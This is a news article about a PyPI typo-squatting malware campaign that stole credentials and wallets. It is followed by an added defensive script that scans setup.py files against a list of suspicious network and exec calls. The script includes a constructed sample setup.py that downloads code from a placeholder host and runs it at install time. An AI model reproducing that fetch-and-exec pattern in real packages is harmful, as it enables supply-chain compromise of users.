
Malware Upload Attack Hits PyPI Repository

Maintainers of the Python Package Index (PyPI) repository were forced to suspend new project creation and new user registration to mitigate a malware upload campaign.


Maintainers of the Python Package Index (PyPI) repository were forced to suspend new project creation and new user registration on Thursday to mitigate a worrisome malware upload campaign.

The confirmation of the PyPI incident, which has since been resolved, comes as security researchers at Checkmarx warn that multiple malicious Python packages are being pushed via typo-squatting techniques.

“This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extension data, etc.) and various credentials. In addition, the malicious payload employed a persistence mechanism to survive reboots,” Checkmarx said in a research note.

Earlier this week, the company said it spotted multiple malicious Python packages being uploaded to the Python Package Index (PyPI) and noted that these packages were most likely created using automation tools.

“The malicious code is located within each package’s setup.py file, enabling automatic execution upon installation,” Checkmarx explained. “Upon execution, the malicious code within the setup.py file attempted to retrieve an additional payload from a remote server. The URL for the payload was dynamically constructed by appending the package name as a query parameter.”

The end result is an info-stealer designed to harvest sensitive information from the victim’s machine, paired with a persistence mechanism that keeps it active on the compromised system even after the initial execution.
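As an added defender-side illustration (not code from the article or from Checkmarx), the script below parses a setup.py with Python's `ast` module, without executing it, and flags the install-time behaviour described above: network imports, URL fetches, and `exec` of downloaded content. The two setup.py sources embedded in it are constructed samples, and `example.invalid` is a placeholder host.

```python
import ast
from typing import List

# Modules and call names that rarely belong in a setup.py: a build script should
# describe the package, not reach out to the network, decode blobs, or run code.
SUSPICIOUS_MODULES = {"urllib", "urllib.request", "requests", "socket",
                      "http.client", "subprocess", "base64"}
SUSPICIOUS_CALLS = {"urlopen", "get", "post", "exec", "eval", "Popen", "run",
                    "system", "b64decode"}

def find_setup_py_indicators(source: str) -> List[str]:
    """Parse setup.py source (never executed) and list suspicious imports and calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.Call):
            # foo(...) -> Name.id, obj.foo(...) -> Attribute.attr; anything else -> ""
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", "")
            if name in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: calls {name}()")
    return findings

# Constructed sample mirroring the pattern the article describes: the package name
# is appended as a query parameter and the response is executed at install time.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import urllib.request
NAME = "example-pkg"
resp = urllib.request.urlopen("https://example.invalid/p?name=" + NAME)
exec(resp.read())
setup(name=NAME, version="0.0.1")
'''

# Constructed benign setup.py for comparison: metadata only, no install-time side effects.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-pkg", version="0.0.1", packages=["example_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY), ("sample", SAMPLE_SETUP_PY)):
        print(label, find_setup_py_indicators(src) or ["no indicators"])
```

Run it against a downloaded sdist's setup.py before installing; a hit is a reason to read the file, not proof of malice, since some legitimate builds do call subprocess.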

“The discovery of these malicious Python packages on PyPI highlights the ongoing nature of cybersecurity threats within the software development ecosystem. This incident is not an isolated case, and similar attacks targeting package repositories and software supply chains are likely to continue,” the company warned.


Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.
